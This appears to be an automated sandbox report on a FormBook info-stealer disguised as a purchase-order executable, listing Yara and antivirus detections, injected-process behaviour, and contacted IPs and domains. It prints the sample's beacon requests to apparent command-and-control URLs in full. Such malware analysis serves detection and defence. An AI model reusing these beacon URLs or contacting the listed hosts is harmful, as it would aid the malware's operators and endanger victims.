Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_013E7280
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_013E8AD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_013DECBB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_013E873D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_013E87E4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_013E8648
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_013E7EDC

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 0_2_013DC26F GetSystemTimeAsFileTime,__aulldiv,

0_2_013DC26F

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.58.78.16	unknown	United States	16509	AMAZON-02US	true
194.35.122.226	unknown	Germany	35913	DEDIPATH-LLCUS	true
185.201.11.126	unknown	Germany	47583	AS-HOSTINGERLT	true
3.134.22.63	unknown	United States	16509	AMAZON-02US	true
160.153.136.3	unknown	United States	21501	GODADDY-AMSDE	true
103.224.182.242	unknown	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
104.253.79.71	unknown	United States	18779	EGIHOSTINGUS	true
52.71.133.130	unknown	United States	14618	AMAZON-AESUS	true
3.12.202.18	unknown	United States	16509	AMAZON-02US	false
35.246.6.109	unknown	United States	15169	GOOGLEUS	true
154.86.218.70	unknown	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
13.226.173.80	unknown	United States	16509	AMAZON-02US	true

Contacted Domains

Name	IP	Active
www.realitytvstockwatch.com	103.224.182.242	true
www.the-gongs.com	104.253.79.71	true
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true
sweetbasilmarketing.com	185.201.11.126	true
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	3.12.202.18	true
www.maninhatphoto.com	154.86.218.70	true
fahufu.com	194.35.122.226	true
www.justsoldbykristen.com	52.71.133.130	true
heartandcrowncloset.com	160.153.136.3	true
searchnehomes.com	34.102.136.180	true
www.lotoencasa.com	192.155.168.14	true
www.ariasu-nakanokaikei.com	13.226.173.80	true
www.hemparcade.com	52.58.78.16	true
www.searchnehomes.com	unknown	unknown
www.heartandcrowncloset.com	unknown	unknown
www.fahufu.com	unknown	unknown
www.placeduconfort.com	unknown	unknown
www.handsfreedocs.com	unknown	unknown
www.shopnicknaks.com	unknown	unknown
www.happinestbuilders.com	unknown	unknown
www.sweetbasilmarketing.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.the-gongs.com/igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.fahufu.com/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.placeduconfort.com/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.maninhatphoto.com/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.happinestbuilders.com/igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown
http://www.shopnicknaks.com/igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: Purchase Order 40,7045$.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: Purchase Order 40,7045$.exe	Virustotal: Detection: 43%			Perma Link
Source: Purchase Order 40,7045$.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: Purchase Order 40,7045$.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 4x nop then pop edi	1_2_00415044
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 4x nop then pop edi	1_2_00415C88
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 4x nop then pop ebx	1_2_004066DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi	5_2_02B15044
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop ebx	5_2_02B066DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi	5_2_02B15C88

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View	IP Address: 185.201.11.126 185.201.11.126

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
Source: Joe Sandbox View	ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT

Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.handsfreedocs.com

Source: global traffic

Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.hemparcade.com
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.hemparcade.com/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp	String found in binary or memory: http://yuyabo.com/

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
